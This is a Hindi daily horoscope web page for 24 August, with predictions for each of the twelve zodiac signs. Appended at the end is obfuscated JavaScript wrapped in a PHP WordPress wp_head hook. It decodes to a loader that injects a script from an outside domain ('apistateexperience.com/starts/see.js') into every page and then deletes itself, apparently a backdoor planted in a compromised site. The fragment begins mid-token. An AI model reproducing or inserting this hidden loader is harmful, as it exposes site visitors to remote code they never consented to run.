Saturday, July 27, 2024
spot_img

24 अगस्त राशिफल– आज मिथुन राशि वाले जातक रहें सावधान, इन कष्टों से हो सकता हैं सामना, कुंभ राशि वालों को भी इन कुछ खास उपायों से मिल सकता हैं लाभ

मेष राशि। आज आपका मन परेशान हो सकता है, संयम बनाकर रखें। व्यर्थ के क्रोध एवं वाद-विवाद से बचने का प्रयास करें। नौकरी में अफसरों का सहयोग मिलेगा। विदेश यात्रा के अवसर मिल सकते हैं। माता-पिता का सानिध्य मिलेगा। परिवार के साथ यात्रा का कार्यक्रम बन सकता है। परिवार में सुख-शान्ति रहेगी। खर्च अधिक होंगे,फिजूलखर्ची में नियंत्रण रखें। मित्रों का सहयोग मिलेगा। धार्मिक कार्यक्रम में हिस्सा ले सकते हैं, धार्मिक गतिविधियों में शामिल होंगे। धन की प्राप्ति हो सकती है।


वृष राशि। आज आपकी वाणी में मधुरता बनी रहेगी। शैक्षिक कार्यों में सफलता मिलेगी। लेखनादि-बौद्धिक कार्यों में व्यस्तता रहेगी। बौद्धिक कार्यों से आय में वृद्धि होगी। नौकरी में तरक्की के अवसर मिल सकते हैं। कार्यभार में भी वृद्धि होगी। किसी दूसरे स्थान पर जाना पड़ सकता है। परिवार एवं भाइयों के साथ किसी धार्मिक स्थान की यात्रा पर जा सकते हैं, धार्मिक गतिविधियों में शामिल होंगे। खर्चों की अधिकता रहेगी, संभल कर खर्चे, स्वास्थ्‍य का ध्यान रखें।

मिथुन राशि। मानसिक शान्ति रहेगी। व्यर्थ के विवादों से बचने का प्रयास करें आपके लिए बेहतर होगा। कार्यक्षेत्र में परिश्रम अधिक रहेगा। कठिनाइयों का सामना करना पड़ सकता है। खर्च अधिक रहेंगे, संभल कर खर्चे। आपकी वाणी में सौम्यता रहेगी। फिर भी आत्मसंयत रहें। माता का सानिध्य मिलेगा। अचानक धन प्राप्ति के योग बन रहे हैं। लंबे समय से रुके हुआ धन मिलने की उम्मीद भी है। अफसरों से वैचारिक मतभदे हो सकते हैं, बातचीत में संयम बरतें। घर-परिवार में धार्मिक कार्य हो सकते हैं।

कर्क राशि। आज आपका कला या संगीत के प्रति रुझान बढ़ सकता है। कारोबार का विस्तार हो सकता है। पिता से आर्थिक सहयोग मिल सकता है। शैक्षिक कार्यों में सफलता मिलेगी।आज आपके अन्दर आशा और निराशा के मिश्रित भाव बने रहेंगे। आपका पारिवारिक जीवन सुखमय रहेगा। धैर्यशीलता में कमी आएगी, संयम और धैर्य बनाकर रखें। बातचीत में संयत रहें। वाणी में कठोरता का प्रभाव हो सकता है। नौकरी में विदेश यात्रा के योग बन रहे हैं। किसी बुजुर्ग से धन की प्राप्ति हो सकती है।

सिंह राशि। आज आपके अन्दर आत्मविश्वास भरपूर रहेगा। मानसिक शान्ति रहेगी। कुटुम्ब-परिवार में धार्मिक कार्य हो सकते हैं। खर्च बढ़ सकते हैं। कारोबार से धन लाभ में वृद्धि होगी। लाभ के अवसर मिलेंगे। किसी पुराने मित्र से भेंट हो सकती है। संचित धन में कमी आ सकती है। भाई-बहनों के सहयोग से किसी पैतृक कारोबार का विस्तार हो सकता है। सुस्वादु खानपान में रुचि बढ़ सकती है। तनाव से बचने का प्रयास करें आपके लिए बेहतर होगा।

कन्या राशि। आज आपका मन शान्त रहेगा। आत्मविश्वास से परिपूर्ण रहेंगे। दाम्पत्य सुख में वृद्धि होगी। खर्चों की अधिकता से परेशान हो सकते हैं, संभल कर खर्चे। भागदौड़ अधिक रहेगी। शैक्षिक कार्यों के लिए यात्रा पर जा सकते हैं। किसी राजनेता से भेंट हो सकती है। जीवनसाथी के स्वास्थ्‍य का ध्यान रखें। आशा-निराशा के मिश्रित भाव मन में रहेंगे। पारिवारिक समस्याएं परेशान कर सकती हैं। वाहन सुख की प्राप्ति हो सकती है।

तुला राशि। आज आशा-निराशा के भाव मन में हो सकते हैं। जीवनसाथी के स्वास्थ्य का ध्यान रखें। कारोबार में भी कठिनाइयों का सामना करना पड़ सकता है। मानसिक शान्ति रहेगी। नौकरी में बदलाव के योग बन रहे हैं। उच्च पद की प्राप्ति हो सकती है। कला एवं संगीत के प्रति रुझान बढ़ेगा। भवन सुख का विस्तार होगा। खर्चों की अधिकता रहेगी, संभल कर खर्चे। मित्रों का सहयोग मिलेगा। मान-सम्मान में वृद्धि होगी।


वृश्चिक राशि। आज आपके अन्दर आत्मविश्वास भरपूर रहेगा, परन्तु अतिउत्साही होने से बचें, बेहतर होगा। नौकरी में अफसरों से व्यर्थ के वाद-विवाद हो सकते हैं। कार्यक्षेत्र में कठिनाइयां आ सकती हैं। कारोबार में वृद्धि होगी, परन्तु कुछ समस्याओं के लिए भी तैयार रहें। भाइयों का सहयोग मिलेगा। परिश्रम अधिक रहेगा। जीवनसाथी का साथ मिलेगा। शैक्षिक कार्यों में सफलता के योग बन रहे हैं। विदेश यात्रा पर भी जाना हो सकता है।

धनु राशि। आज आपके मन में मानसिक शान्ति रहेगी, परन्तु नकारात्मक विचारों से बचें,सकारात्मकता के लिए प्रयास करें। अपने सन्तान के स्वास्थ्य का ध्यान रखें। शैक्षिक कार्यों के लिए विदेश जा सकते हैं। शासन-सत्ता का सहयोग मिलेगा। भवन सुख में वृद्धि होगी। परिवार में सुख-शान्ति रहेगी। मित्रों का सहयोग मिलेगा। आलस्य की अधिकता रहेगी। रहन-सहन कष्टमय हो सकता है। नौकरी में अफसरों का सहयोग मिलेगा। खर्च बढ़ सकते हैं।

मकर राशि। आज आपके अन्दर आत्मविश्वास भरपूर रहेगा, परन्तु धैर्यशीलता में कमी रहेगी। माता के स्वास्थ्य का ध्यान रखें। बौद्धिक कार्यों में व्यस्तता रहेगी। आय के साधन बन सकते हैं। अपनी भावनाओं को वश में रखने का प्रयास करें आपके लिए बेहतर होगा। मन में निराशा एवं असन्तोष के भाव रहेंगे। वाहन सुख में वृद्धि के योग बन रहे हैं। खर्चों की अधिकता से परेशान हो सकते हैं। भवन के रखरखाव एवं साज-सज्जा के कार्यों पर खर्च बढ़ सकते हैं।

कुंभ राशि। आज आपका मन परेशान रहेगा। धैर्यशीलता बनाये रखने के प्रयास करें। किसी मित्र के सहयोग से आय वृद्धि के साधन बन सकते हैं। परिवार के साथ यात्रा पर जा सकते हैं। नौकरी में परिवर्तन की सम्भावना बन रही है। धर्म के प्रति श्रद्धाभाव रहेगा, धार्मिक गतिविधियों में शामिल होंगे। तरक्की के अवसर मिल सकते हैं। कार्यक्षेत्र का विस्तार होगा। उच्चपद की प्राप्ति होगी। स्वास्थ्य को लेकर चली आ रही परेशानियों से राहत मिल सकती है।


मीन राशि। आज आपको किसी रुके हुए धन की प्राप्ति हो सकती है। दाम्पत्य सुख में वृद्धि होगी। आपका पारिवारिक जीवन सुखमय रहेगा। कारोबार में बढ़ोतरी होगी। आय के नए स्रोत विकसित होंगे, आर्थिक स्थिति में सुधार होगा। सन्तान की ओर से सुखद समाचार मिल सकते हैं। शैक्षिक कार्यों में सफलता मिलेगी। क्रोध एवं आवेश की अधिकता रहेगी। आत्मसंयत रहें। किसी पैतृक सम्पत्ति से धनार्जन के स्रोत विकसित हो सकते हैं। परिवार में हंसी-खुशी का माहौल रहेगा।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>